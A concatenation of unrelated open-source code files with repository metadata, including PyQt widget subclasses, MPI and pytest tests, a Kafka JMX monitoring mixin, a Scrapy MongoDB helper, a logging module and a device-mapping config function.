if not all(key in dictionary for key in keys):
raise KeyError("Dictionary missing key values."
"Requires: {}".format(keys))
return True
``` |
{
"source": "1313e/GuiPy",
"score": 2
} |
#### File: guipy/widgets/base.py
```python
from sys import platform
# Package imports
from qtpy import QtCore as QC, QtGui as QG, QtWidgets as QW
# GuiPy imports
# All declaration
__all__ = ['QAbstractButton', 'QAction', 'QCheckBox', 'QComboBox', 'QDialog',
'QDockWidget', 'QDoubleSpinBox', 'QFileDialog', 'QFontComboBox',
'QGroupBox', 'QHeaderView', 'QLabel', 'QLineEdit', 'QListView',
'QListWidget', 'QMainWindow', 'QMenu', 'QMessageBox', 'QPushButton',
'QRadioButton', 'QSpinBox', 'QSplitter', 'QScrollArea',
'QStackedWidget', 'QTabBar', 'QTableView', 'QTabWidget',
'QTextEdit', 'QToolBar', 'QToolButton', 'QToolTip', 'QWidget']
# %% BASE CLASS DEFINITION
# Make subclass of QWidget to provide certain functionality to all widgets
class QWidget(QW.QWidget):
"""
Defines the :class:`~QWidget` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QWidget` class and is inherited by all other
custom :class:`~PyQt5.QtWidgets.QWidget` classes.
"""
# Initialize QWidget
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Retrieve certain methods from parent
self.get_parent_methods()
# This function retrieves a set of methods from the parent if possible
def get_parent_methods(self):
# Obtain parent widget
parent = self.parentWidget()
# If this widget has a parent, retrieve a few methods if possible
if parent is not None:
# Retrieve the 'get_option' method if it exists
if(not hasattr(self, 'get_option') and
hasattr(parent, 'get_option')):
self.get_option = parent.get_option
# Override setStatusTip to auto translate
def setStatusTip(self, text):
super().setStatusTip(text)
# Override setToolTip to auto translate
def setToolTip(self, text):
super().setToolTip(text)
# Override childEvent to add 'get_option' if it exists to all children
def childEvent(self, event):
"""
Special :meth:`~PyQt5.QtCore.QObject.childEvent` event that
automatically calls the :meth:`~get_parent_methods` method on any
widget that becomes a child of this widget.
"""
# If this event involved a child being added, check child object
if(event.type() == QC.QEvent.ChildAdded):
# Obtain child object
child = event.child()
# If this child has the 'get_parent_methods' method, call it
if hasattr(child, 'get_parent_methods'):
child.get_parent_methods()
# Call and return super method
return(super().childEvent(event))
# Override setLocale to also set it for all children
def setLocale(self, locale):
# Set locale for this object
super().setLocale(locale)
# Also set this locale for all children that are widgets
for child in self.children():
if isinstance(child, QWidget):
child.setLocale(locale)
# %% CLASS DEFINITIONS
# Create custom QAbstractButton
class QAbstractButton(QW.QAbstractButton, QWidget):
# Override constructor to set some default settings
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Use default settings
self.setSizePolicy(QW.QSizePolicy.Fixed, QW.QSizePolicy.Fixed)
# Make subclass of QW.QAction that automatically sets details based on status
class QAction(QW.QAction):
"""
Defines the :class:`~QAction` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QAction` class.
"""
# Override constructor
def __init__(self, parent, text, *, shortcut=None, tooltip=None,
statustip=None, icon=None, triggered=None, toggled=None,
role=None):
"""
Initializes the :class:`~QAction` class.
Parameters
----------
parent : :obj:`~PyQt5.QtWidgets.QWidget` object or None
The parent widget for this dialog or *None* for no parent.
text : str
The label that this action must have.
Optional
--------
shortcut : :obj:`~PyQt5.QtGui.QKeySequence` or None. Default: None
The key sequence that must be set as the shortcut for this action.
If *None*, no shortcut will be set.
tooltip : str or None. Default: None
The text that must be set as the tooltip for this action.
If *None*, the tooltip is set to `text`.
If `shortcut` is not *None*, the tooltip will also include the
shortcut.
statustip : str or None. Default: None
The text that must be set as the statustip for this action.
If *None*, the statustip is set to `tooltip`.
icon : :obj:`~PyQt5.QtGui.QIcon` object or None. Default: None
The icon that must be set as the icon for this action.
If *None*, no icon will be set.
triggered : function or None. Default: None
The Qt slot function that must be called whenever this action is
triggered.
If *None*, no slot will be connected to this action's `triggered`
signal.
toggled : function or None. Default: None
The Qt slot function that must be called whenever this action is
toggled.
If *None*, no slot will be connected to this action's `toggled`
signal.
role : :obj:`~PyQt5.QtWidgets.QAction.MenuRole` object or None. \
Default: None
The menu role that must be set as the role of this action.
If *None*, it is set to :obj:`~PyQt5.QtWidgets.NoRole`.
"""
# Call super constructor
if icon is None:
super().__init__(text, parent)
else:
super().__init__(icon, text, parent)
# Set all the details
self.setDetails(shortcut=shortcut,
tooltip=tooltip,
statustip=statustip)
# Set the triggered signal
if triggered is not None:
self.triggered.connect(triggered)
# Set the toggled signal
if toggled is not None:
self.toggled.connect(toggled)
self.setCheckable(True)
# Set the action menu role
self.setMenuRole(self.NoRole if role is None else role)
# Make new method that automatically sets Shortcut, ToolTip and StatusTip
def setDetails(self, *, shortcut=None, tooltip=None, statustip=None):
"""
Uses the provided `shortcut`; `tooltip`; and `statustip` to set the
details of this action.
Parameters
----------
shortcut : :obj:`~PyQt5.QtGui.QKeySequence` or None. Default: None
The key sequence that must be set as the shortcut for this action.
If *None*, no shortcut will be set.
tooltip : str or None. Default: None
The text that must be set as the tooltip for this action.
If *None*, the tooltip is set to `text`.
If `shortcut` is not *None*, the tooltip will also include the
shortcut.
statustip : str or None. Default: None
The text that must be set as the statustip for this action.
If *None*, the statustip is set to `tooltip`.
"""
# If shortcut is not None, set it
if shortcut is not None:
super().setShortcut(shortcut)
shortcut = self.shortcut().toString()
# If tooltip is None, its base is set to the action's name
if tooltip is None:
base_tooltip = self.text().replace('&', '')
tooltip = base_tooltip
# Else, provided tooltip is used as the base
else:
base_tooltip = tooltip
# If shortcut is not None, add it to the tooltip
if shortcut is not None:
tooltip = "%s (%s)" % (base_tooltip, shortcut)
# Set tooltip
super().setToolTip(tooltip)
# If statustip is None, it is set to base_tooltip
if statustip is None:
statustip = base_tooltip
# Set statustip
super().setStatusTip(statustip)
# Override setShortcut to raise an error when used
def setShortcut(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Override setToolTip to raise an error when used
def setToolTip(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Override setStatusTip to raise an error when used
def setStatusTip(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Create custom QCheckBox
class QCheckBox(QW.QCheckBox, QAbstractButton):
pass
# Create custom combobox class with more signals
class QComboBox(QW.QComboBox, QWidget):
"""
Defines the :class:`~QComboBox` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QComboBox` class.
"""
# Signals
popup_shown = QC.Signal([int], [str])
popup_hidden = QC.Signal([int], [str])
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setSizeAdjustPolicy(self.AdjustToContents)
# Override the showPopup to emit a signal whenever it is triggered
def showPopup(self, *args, **kwargs):
self.popup_shown[int].emit(self.currentIndex())
self.popup_shown[str].emit(self.currentText())
return(super().showPopup(*args, **kwargs))
# Override the hidePopup to emit a signal whenever it is triggered.
def hidePopup(self, *args, **kwargs):
self.popup_hidden[int].emit(self.currentIndex())
self.popup_hidden[str].emit(self.currentText())
return(super().hidePopup(*args, **kwargs))
# Create custom QFontComboBox class
class QFontComboBox(QW.QFontComboBox, QWidget):
# Signals
popup_shown = QC.Signal([int], [str])
popup_hidden = QC.Signal([int], [str])
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setSizeAdjustPolicy(self.AdjustToContents)
# Override the showPopup to emit a signal whenever it is triggered
def showPopup(self, *args, **kwargs):
self.popup_shown[int].emit(self.currentIndex())
self.popup_shown[str].emit(self.currentText())
return(super().showPopup(*args, **kwargs))
# Override the hidePopup to emit a signal whenever it is triggered.
def hidePopup(self, *args, **kwargs):
self.popup_hidden[int].emit(self.currentIndex())
self.popup_hidden[str].emit(self.currentText())
return(super().hidePopup(*args, **kwargs))
# Create custom QDialog
class QDialog(QW.QDialog, QWidget):
pass
# Create custom QDockWidget
# TODO: Add a context menu button to all dockwidgets by default?
class QDockWidget(QW.QDockWidget, QWidget):
pass
# Create custom QFileDialog class
class QFileDialog(QW.QFileDialog, QDialog):
pass
# Create custom QGroupBox class
class QGroupBox(QW.QGroupBox, QWidget):
pass
# Create custom QHeaderView class
class QHeaderView(QW.QHeaderView, QWidget):
pass
# Create custom QAbstractSpinBox that automatically sets some properties
class QAbstractSpinBox(QW.QAbstractSpinBox, QWidget):
"""
Defines the :class:`~QAbstractSpinBox` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QAbstractSpinBox` class.
"""
# Override constructor to set some default settings
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Use default settings
self.setStepType(self.AdaptiveDecimalStepType)
self.setAccelerated(True)
self.setGroupSeparatorShown(True)
self.setStyleSheet(
"""
QAbstractSpinBox {{
margin: {0}px 0px {0}px 0px;
max-height: 24px;}}
""".format("-1" if platform.startswith('linux') else '0'))
# Auto translate any special value text that is set
def setSpecialValueText(self, text):
super().setSpecialValueText(text)
# This function returns the value of this box
def get_box_value(self, *value_sig):
# Obtain the value of this box
value = self.value()
# If this value is the minimum, set it to the special value text
if self.specialValueText() and (value == self.minimum()):
value = self.specialValueText()
# Return value
return(value)
# This function sets the value of this box
def set_box_value(self, value, *value_sig):
# If the value is the same as the special value text, set to minimum
if value and (value == self.specialValueText()):
value = self.minimum()
# Set value
self.setValue(value)
# Create custom QDoubleSpinBox
class QDoubleSpinBox(QW.QDoubleSpinBox, QAbstractSpinBox):
pass
# Create custom QSpinBox
class QSpinBox(QW.QSpinBox, QAbstractSpinBox):
pass
# Create custom QLabel class with more signals
class QLabel(QW.QLabel, QWidget):
"""
Defines the :class:`~QLabel` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QLabel` class.
"""
# Signals
contentsChanged = QC.Signal([str], [QG.QMovie], [QG.QPicture],
[QG.QPixmap])
mousePressed = QC.Signal()
def __init__(self, text=None, *args, **kwargs):
# Call super constructor
if text is None:
super().__init__(*args, **kwargs)
else:
super().__init__(text, *args, **kwargs)
# Set some settings
self.setWordWrap(True)
self.setOpenExternalLinks(True)
# Override the mousePressEvent to emit a signal whenever it is triggered
def mousePressEvent(self, event):
self.mousePressed.emit()
event.accept()
# Override setMovie to emit a signal whenever it is called
def setMovie(self, movie):
super().setMovie(movie)
self.contentsChanged[QG.QMovie].emit(self.movie())
# Override setNum to emit a signal whenever it is called
def setNum(self, num):
super().setNum(num)
self.contentsChanged[str].emit(self.text())
# Override setPicture to emit a signal whenever it is called
def setPicture(self, picture):
super().setPicture(picture)
self.contentsChanged[QG.QPicture].emit(self.picture())
# Override setPixmap to emit a signal whenever it is called
def setPixmap(self, pixmap):
super().setPixmap(pixmap)
self.contentsChanged[QG.QPixmap].emit(self.pixmap())
# Override setText to emit a signal whenever it is called
def setText(self, text):
super().setText(text)
self.contentsChanged[str].emit(self.text())
# Create custom QLineEdit class
class QLineEdit(QW.QLineEdit, QWidget):
pass
# Create custom QListView class
class QListView(QW.QListView, QWidget):
pass
# Create custom QListWidget class
class QListWidget(QW.QListWidget, QWidget):
pass
# Create custom QMainWindow class
class QMainWindow(QW.QMainWindow, QWidget):
pass
# Create custom QMenu class
class QMenu(QW.QMenu, QWidget):
"""
Defines the :class:`~QMenu` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QMenu` class.
"""
def __init__(self, name, title=None, parent=None, *, tooltip=None,
statustip=None):
# Save name
self.name = name
# If title is None, set it to name
if title is None:
title = name
# Call super constructor
super().__init__(title, parent)
# Set all the details
self.setDetails(tooltip=tooltip,
statustip=statustip)
# Make new method that automatically sets ToolTip and StatusTip
def setDetails(self, *, tooltip=None, statustip=None):
"""
Uses the provided `tooltip` and `statustip` to set the details of this
menu action.
Parameters
----------
tooltip : str or None. Default: None
The text that must be set as the tooltip for this menu.
If *None*, the tooltip is set to `title`.
statustip : str or None. Default: None
The text that must be set as the statustip for this menu.
If *None*, the statustip is set to `tooltip`.
"""
# Obtain the action that triggers this menu
menu_action = self.menuAction()
# If tooltip is None, it is set to the menu's name
if tooltip is None:
tooltip = self.title().replace('&', '')
# Set tooltip
menu_action.setToolTip(tooltip)
# If statustip is None, it is set to tooltip
if statustip is None:
statustip = tooltip
# Set statustip
menu_action.setStatusTip(statustip)
# Override setToolTip to raise an error when used
def setToolTip(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Override setStatusTip to raise an error when used
def setStatusTip(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Override addSection to automatically translate the given section name
def addSection(self, text, icon=None):
# Call super method
if icon is None:
return(super().addSection(text))
else:
return(super().addSection(icon, text))
# Create custom QMessageBox class
class QMessageBox(QW.QMessageBox, QDialog):
pass
# Create custom QPushButton class
class QPushButton(QW.QPushButton, QAbstractButton):
pass
# Create custom QRadioButton class
class QRadioButton(QW.QRadioButton, QAbstractButton):
pass
# Create custom QScrollArea class
class QScrollArea(QW.QScrollArea, QWidget):
pass
# Create custom QSplitter class
class QSplitter(QW.QSplitter, QWidget):
pass
# Create custom QStackedWidget class
class QStackedWidget(QW.QStackedWidget, QWidget):
pass
# Create custom QTabBar class
class QTabBar(QW.QTabBar, QWidget):
# Signals
tabTextChanged = QC.Signal(int, str)
# Override constructor to set some default settings
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Use default settings
self.setElideMode(QC.Qt.ElideNone)
# Override setTabText to emit a signal whenever it is called
def setTabText(self, index, text):
# Emit signal
self.tabTextChanged.emit(index, text)
# Call super method
return(super().setTabText(index, text))
# Create custom QTableView class
class QTableView(QW.QTableView, QWidget):
pass
# Create custom QTabWidget class
class QTabWidget(QW.QTabWidget, QWidget):
"""
Defines the :class:`~QTabWidget` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QTabWidget` class.
"""
# Signals
currentIndexChanged = QC.Signal(int)
currentTextChanged = QC.Signal(str)
currentWidgetChanged = QC.Signal(QW.QWidget)
tabTextChanged = QC.Signal(int, str)
tabWasInserted = QC.Signal([int], [int, str], [int, QW.QWidget])
tabWasRemoved = QC.Signal(int)
# Override constructor to connect some signals
def __init__(self, *args, browse_tabs=False, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Set up the tab widget
self.init(browse_tabs)
# This function sets up the tab widget
def init(self, browse_tabs):
# Set default tabbar
self.setTabBar(QTabBar())
# Connect signals
self.currentChanged.connect(self.currentIndexChanged)
self.currentChanged.connect(
lambda index: self.currentTextChanged.emit(self.tabText(index)))
self.currentChanged.connect(
lambda index: self.currentWidgetChanged.emit(self.widget(index)))
# Check if a browse menu was requested
if browse_tabs:
# Create a menu containing all available tabs
browse_menu = QMenu('Browse', parent=self)
browse_menu.aboutToShow.connect(self.update_browse_menu)
self.browse_menu = browse_menu
# Create a toolbutton for browsing all available tabs
browse_but = QToolButton()
browse_but.setText('V')
browse_but.setToolTip("Browse tabs")
browse_but.setMenu(browse_menu)
browse_but.setPopupMode(browse_but.InstantPopup)
self.browse_but = browse_but
# Set browse button as the left corner widget
self.setCornerWidget(browse_but, QC.Qt.TopLeftCorner)
# This function updates the browse menu
def update_browse_menu(self):
"""
Updates the browse menu that shows all available tabs.
"""
# Remove all actions currently in the browse menu
self.browse_menu.clear()
# Loop over all available tabs
for i, name in enumerate(self.tabNames()):
# Create a toggleable action for this tab
tab_act = QAction(
self, name,
icon=self.tabIcon(i),
tooltip=self.tabToolTip(i),
toggled=lambda *args, index=i: self.setCurrentIndex(index))
# If this tab is currently selected, check it
tab_act.setChecked(self.currentIndex() == i)
# Add action to menu
self.browse_menu.addAction(tab_act)
# Override addTab to automatically translate the given tab name
def addTab(self, widget, label, icon=None):
# Call super method
if icon is None:
return(super().addTab(widget, label))
else:
return(super().addTab(widget, icon, label))
# Override setTabBar to automatically connect some signals
def setTabBar(self, tabbar):
# Connect the tabTextChanged signals
tabbar.tabTextChanged.connect(self.tabTextChanged)
# Call super method
return(super().setTabBar(tabbar))
# Override tabInserted to emit a signal whenever it is called
def tabInserted(self, index):
# Emit tabWasInserted signal
self.tabWasInserted[int].emit(index)
self.tabWasInserted[int, str].emit(index, self.tabText(index))
self.tabWasInserted[int, QW.QWidget].emit(index, self.widget(index))
# Call super method
super().tabInserted(index)
# Override tabRemoved to emit a signal whenever it is called
def tabRemoved(self, index):
# Emit tabWasRemoved signal
self.tabWasRemoved.emit(index)
# Call super method
super().tabRemoved(index)
# Define function that returns a list of all tab names
def tabNames(self):
return(list(map(self.tabText, range(self.count()))))
# Define function that returns a list of all tab widgets
def tabWidgets(self):
return(list(map(self.widget, range(self.count()))))
# Create custom QTextEdit class
class QTextEdit(QW.QTextEdit, QWidget):
pass
# Create custom QToolbar class
class QToolBar(QW.QToolBar, QWidget):
"""
Defines the :class:`~QToolBar` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QToolBar` class.
"""
def __init__(self, name, title=None, parent=None):
# Save name
self.name = name
# If title is None, set it to name
if title is None:
title = name
# Call super constructor
super().__init__(title, parent)
# This function retrieves the action of a menu and adds it to the toolbar
def addMenu(self, menu):
# Obtain the action associated with this menu
action = menu.menuAction()
# Add this action
self.addAction(action)
# Create custom QToolButton class
class QToolButton(QW.QToolButton, QAbstractButton):
# Override constructor to set some default settings
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Use default settings
self.setAutoRaise(True)
# Create custom QToolTip class
class QToolTip(QW.QToolTip):
pass
``` |
{
"source": "1313e/mpi4pyd",
"score": 2
} |
#### File: MPI/tests/test_MPI.py
```python
from types import BuiltinMethodType, MethodType
# Package imports
import numpy as np
import pytest
# mpi4pyd imports
from mpi4pyd import MPI
from mpi4pyd.dummyMPI import COMM_WORLD as d_comm
from mpi4pyd.MPI import (COMM_WORLD as comm, HYBRID_COMM_WORLD as h_comm,
get_HybridComm_obj)
# Get size and rank
rank = comm.Get_rank()
size = comm.Get_size()
# Get method types
m_types = (BuiltinMethodType, MethodType)
# %% PYTEST CLASSES AND FUNCTIONS
# Pytest for get_HybridComm_obj() function
class Test_get_HybridComm_obj(object):
# Test if default input arguments work
def test_default(self):
assert get_HybridComm_obj() is h_comm
# Test if providing comm returns h_comm
def test_comm(self):
assert get_HybridComm_obj(comm) is h_comm
# Test if providing h_comm returns itself
def test_h_comm(self):
assert get_HybridComm_obj(h_comm) is h_comm
# Test if providing d_comm returns itself
def test_d_comm(self):
assert get_HybridComm_obj(d_comm) is d_comm
# Test if providing a comm with size 1 returns d_comm
@pytest.mark.skipif(size == 1, reason="Cannot be pytested in serial")
def test_comm_size_unity(self):
s_comm = comm.Split(comm.Get_rank(), 0)
assert get_HybridComm_obj(s_comm) is d_comm
s_comm.Free()
# Test if providing the wrong object raises an error
def test_invalid_comm(self):
with pytest.raises(TypeError):
get_HybridComm_obj(0)
# Pytest for standard HybridComm obj
@pytest.mark.skipif(size == 1, reason="Pointless to pytest in serial")
class Test_HybridComm_class(object):
# Create fixture for making dummy NumPy arrays
@pytest.fixture(scope='function')
def array(self):
np.random.seed(comm.Get_rank())
return(np.random.rand(size, 10))
# Create fixture for making dummy lists
@pytest.fixture(scope='function')
def lst(self, array):
return(array.tolist())
# Test if h_comm has the same attrs as comm
def test_has_attrs(self):
instance_attrs = dir(comm)
for attr in instance_attrs:
assert hasattr(h_comm, attr)
# Test if all non-overridden attrs in h_comm are the same as in comm
def test_get_attrs(self):
skip_attrs = ['info']
attrs = [attr for attr in dir(comm) if
attr not in (*h_comm.overridden_attrs, *skip_attrs)]
for attr in attrs:
assert getattr(comm, attr) == getattr(h_comm, attr), attr
# Test the attribute setters
def test_set_attrs(self):
# Test if setting a comm attribute raises an error
with pytest.raises(AttributeError):
h_comm.rank = 1
# Test if a new attribute can be created and read
h_comm.pytest_attr = 'test'
assert h_comm.pytest_attr == 'test'
# Test if this attribute is not in comm
assert not hasattr(comm, 'pytest_attr')
# Test the attribute deleters
def test_del_attrs(self):
# Test if deleting a comm attribute raises an error
with pytest.raises(AttributeError):
del h_comm.rank
# Test if deleting a new attribute can be done
del h_comm.pytest_attr
assert not hasattr(h_comm, 'pytest_attr')
# Test default broadcast with an array
def test_bcast_array(self, array):
assert np.allclose(comm.bcast(array, 0), h_comm.bcast(array, 0))
# Test default broadcast with a list
def test_bcast_list(self, lst):
assert np.allclose(comm.bcast(lst, 0), h_comm.bcast(lst, 0))
# Test default gather with an array
def test_gather_array(self, array):
g_array1 = comm.gather(array, 0)
g_array2 = h_comm.gather(array, 0)
assert type(g_array1) == type(g_array2)
if not rank:
for array1, array2 in zip(g_array1, g_array2):
assert np.allclose(array1, array2)
# Test default gather with a list
def test_gather_list(self, lst):
g_lst1 = comm.gather(lst, 0)
g_lst2 = h_comm.gather(lst, 0)
assert type(g_lst1) == type(g_lst2)
if not rank:
for lst1, lst2 in zip(g_lst1, g_lst2):
assert np.allclose(lst1, lst2)
# Test default scatter with an array
def test_scatter_array(self, array):
assert np.allclose(comm.scatter(array, 0), h_comm.scatter(array, 0))
# Test default scatter with a list
def test_scatter_list(self, lst):
assert np.allclose(comm.scatter(list(lst), 0),
h_comm.scatter(list(lst), 0))
# Test default send/recv with an array
def test_sendrecv_array(self, array):
if not rank:
comm.send(array, 1, 123)
h_comm.send(array, 1, 456)
else:
assert np.allclose(comm.recv(None, 0, 123),
h_comm.recv(None, 0, 456))
# Test default send/recv with a list
def test_sendrecv_list(self, lst):
if not rank:
comm.send(list(lst), 1, 123)
h_comm.send(list(lst), 1, 456)
else:
assert np.allclose(comm.recv(None, 0, 123),
h_comm.recv(None, 0, 456))
``` |
{
"source": "1313e/pytest-success",
"score": 2
} |
#### File: pytest_passrunner/tests/test_plugin.py
```python
pytest_plugins = ['pytester']
# %% PYTEST CLASSES AND FUNCTIONS
# Test if the default use of the marker works
def test_default(testdir):
# Create a temporary test file
testdir.makepyfile(
"""
import pytest
@pytest.mark.run_on_pass
class Test(object):
def test_a(self):
pass
def test_b(self):
raise Exception
def test_c(self):
pass
""")
# Run tests
result = testdir.runpytest()
# Check if one passed, one failed and one xfailed
result.assert_outcomes(passed=1, failed=1, xfailed=1)
``` |
{
"source": "13161231996/-",
"score": 2
} |
#### File: douyin/utils/tools.py
```python
import pymongo
import json
import random
import time
from scrapy.conf import settings
class DBTools:
'''
数据库链接类
'''
host = settings['MONGODB_HOST'] # settings 赋值piplines
port = settings['MONGODB_PORT']
dbName = settings['MONGODB_DBNAME'] # 数据库名字
client = pymongo.MongoClient(host=host, port=port) # 链接数据库
tdb = client[dbName]
def __init__(self, name):
print('name:',name)
self.post = self.tdb[name]
def get_db_con(self):
return self.post
class MyTools:
'''
基础工具类
'''
def init_device_id():
value = random.randint(1000000000, 9999999999)
return str(value)
def transform_time(u_time):
timeArray = time.localtime(u_time)
otherStyleTime = time.strftime("%Y/%m/%d %H:%M:%S", timeArray)
return otherStyleTime
``` |
{
"source": "1316591029/kafka",
"score": 2
} |
#### File: services/monitor/jmx.py
```python
from ducktape.utils.util import wait_until
class JmxMixin(object):
"""This mixin helps existing service subclasses start JmxTool on their worker nodes and collect jmx stats.
A couple things worth noting:
- this is not a service in its own right.
- we assume the service using JmxMixin also uses KafkaPathResolverMixin
"""
def __init__(self, num_nodes, jmx_object_names=None, jmx_attributes=None):
self.jmx_object_names = jmx_object_names
self.jmx_attributes = jmx_attributes or []
self.jmx_port = 9192
self.started = [False] * num_nodes
self.jmx_stats = [{} for x in range(num_nodes)]
self.maximum_jmx_value = {} # map from object_attribute_name to maximum value observed over time
self.average_jmx_value = {} # map from object_attribute_name to average value observed over time
def clean_node(self, node):
node.account.kill_process("jmx", clean_shutdown=False, allow_fail=True)
node.account.ssh("rm -rf /mnt/jmx_tool.log", allow_fail=False)
def start_jmx_tool(self, idx, node):
if self.started[idx-1] or self.jmx_object_names is None:
return
# JmxTool is not particularly robust to slow-starting processes. In order to ensure JmxTool doesn't fail if the
# process we're trying to monitor takes awhile before listening on the JMX port, wait until we can see that port
# listening before even launching JmxTool
def check_jmx_port_listening():
return 0 == node.account.ssh("nc -z 127.0.0.1 %d" % self.jmx_port, allow_fail=True)
wait_until(check_jmx_port_listening, timeout_sec=30, backoff_sec=.1,
err_msg="%s: Never saw JMX port for %s start listening" % (node.account, self))
cmd = "%s kafka.tools.JmxTool " % self.path.script("kafka-run-class.sh", node)
cmd += "--reporting-interval 1000 --jmx-url service:jmx:rmi:///jndi/rmi://127.0.0.1:%d/jmxrmi" % self.jmx_port
for jmx_object_name in self.jmx_object_names:
cmd += " --object-name %s" % jmx_object_name
for jmx_attribute in self.jmx_attributes:
cmd += " --attributes %s" % jmx_attribute
cmd += " | tee -a /mnt/jmx_tool.log"
self.logger.debug("Start JmxTool %d command: %s", idx, cmd)
jmx_output = node.account.ssh_capture(cmd, allow_fail=False)
jmx_output.next()
self.started[idx-1] = True
def read_jmx_output(self, idx, node):
if self.started[idx-1] == False:
return
object_attribute_names = []
cmd = "cat /mnt/jmx_tool.log"
self.logger.debug("Read jmx output %d command: %s", idx, cmd)
for line in node.account.ssh_capture(cmd, allow_fail=False):
if "time" in line:
object_attribute_names = line.strip()[1:-1].split("\",\"")[1:]
continue
stats = [float(field) for field in line.split(',')]
time_sec = int(stats[0]/1000)
self.jmx_stats[idx-1][time_sec] = {name : stats[i+1] for i, name in enumerate(object_attribute_names)}
# do not calculate average and maximum of jmx stats until we have read output from all nodes
if any(len(time_to_stats) == 0 for time_to_stats in self.jmx_stats):
return
start_time_sec = min([min(time_to_stats.keys()) for time_to_stats in self.jmx_stats])
end_time_sec = max([max(time_to_stats.keys()) for time_to_stats in self.jmx_stats])
for name in object_attribute_names:
aggregates_per_time = []
for time_sec in xrange(start_time_sec, end_time_sec + 1):
# assume that value is 0 if it is not read by jmx tool at the given time. This is appropriate for metrics such as bandwidth
values_per_node = [time_to_stats.get(time_sec, {}).get(name, 0) for time_to_stats in self.jmx_stats]
# assume that value is aggregated across nodes by sum. This is appropriate for metrics such as bandwidth
aggregates_per_time.append(sum(values_per_node))
self.average_jmx_value[name] = sum(aggregates_per_time) / len(aggregates_per_time)
self.maximum_jmx_value[name] = max(aggregates_per_time)
def read_jmx_output_all_nodes(self):
for node in self.nodes:
self.read_jmx_output(self.idx(node), node)
``` |
{
"source": "13179607996/commcare-hq",
"score": 2
} |
#### File: inddex/reports/master_data_file.py
```python
from django.utils.functional import cached_property
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader
from corehq.apps.reports.generic import GenericTabularReport
from corehq.apps.reports.standard import CustomProjectReport, DatespanMixin
from custom.inddex.filters import (
CaseOwnersFilter,
DateRangeFilter,
GapTypeFilter,
RecallStatusFilter,
)
from custom.inddex.food import FoodData
from custom.inddex.ucr_data import FoodCaseData
class MasterDataFileSummaryReport(DatespanMixin, CustomProjectReport, GenericTabularReport):
title = 'Output 1 - Master Data File'
name = title
slug = 'master_data_file'
export_only = False
exportable = True
@property
def fields(self):
return [CaseOwnersFilter, DateRangeFilter, RecallStatusFilter]
@property
def headers(self):
return DataTablesHeader(
*(DataTablesColumn(header) for header in self._food_data.headers)
)
@property
def rows(self):
return self._food_data.rows
@cached_property
def _food_data(self):
return FoodData(
self.domain,
datespan=self.datespan,
case_owners=self.request.GET.get('case_owners'),
recall_status=self.request.GET.get('recall_status'),
)
``` |
{
"source": "1317/RaphaelScriptHelper",
"score": 3
} |
#### File: 1317/RaphaelScriptHelper/log.py
```python
import logging,time
log_filename = r'./log/rg' + time.strftime('_%Y%m%d') + '.log'
logger = logging.getLogger('rg_log')
logger.setLevel(logging.INFO)
# 调用模块时,如果错误引用,比如多次调用,每次会添加Handler,造成重复日志,这边每次都移除掉所有的handler,后面在重新添加,可以解决这类问题
while logger.hasHandlers():
for i in logger.handlers:
logger.removeHandler(i)
# file log
format='%(asctime)s [%(levelname)s] %(message)s'
date_format= '%Y/%m/%d %H:%M:%S'
formatter = logging.Formatter(fmt=format,datefmt=date_format)
handler = logging.FileHandler(log_filename, encoding='utf-8')
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
def debug(msg, exc_info=False, stack_info=False):
logger.debug(msg,exc_info=exc_info,stack_info=stack_info)
def info(msg, exc_info=False, stack_info=False):
logger.info(msg,exc_info=exc_info,stack_info=stack_info)
def warning(msg, exc_info=False, stack_info=False):
logger.warning(msg,exc_info=exc_info,stack_info=stack_info)
def error(msg, exc_info=False, stack_info=False):
logger.error(msg,exc_info=exc_info,stack_info=stack_info)
def critical(msg, exc_info=False, stack_info=False):
logger.critical(msg,exc_info=exc_info,stack_info=stack_info)
if __name__ == '__main__':
logger.debug('debug')
logger.info('info')
logger.warning('warning')
logger.error('error')
logger.critical('critical')
``` |
{
"source": "1321024918/MegEngine",
"score": 3
} |
#### File: megengine/_internal/config.py
```python
import collections
import os
from . import mgb as _mgb
_default_device_type = "CUDA"
def set_device_map(logical_dev, physical_dev, device_type=None):
"""map from *logical_dev* to *physical_dev* for furture comp node
loading
example::
set_device_map(0, 2, 'CPU') # cpu0 -> cpu2
set_device_map('gpu3', 'gpu0') # gpu0 -> gpu0
:param device_type: specify the device type if devices are given by
integers; if devices are given by integers and ``device_type`` is not
given, the default value ``'CUDA'`` would be used. Possible values are
``'CUDA'`` and ``'CPU'``.
"""
if device_type is None:
device_type = _default_device_type
if device_type == "CUDA":
xpu = "gpu"
else:
assert device_type == "CPU"
xpu = "cpu"
def rmxpu(v):
if isinstance(v, str):
assert v.startswith(xpu) or v.startswith("xpu"), (
"bad comp node in set_device_map: "
"device_type={} comp_node={}".format(device_type, v)
)
return v[3:]
return v
logical_dev, physical_dev = map(rmxpu, [logical_dev, physical_dev])
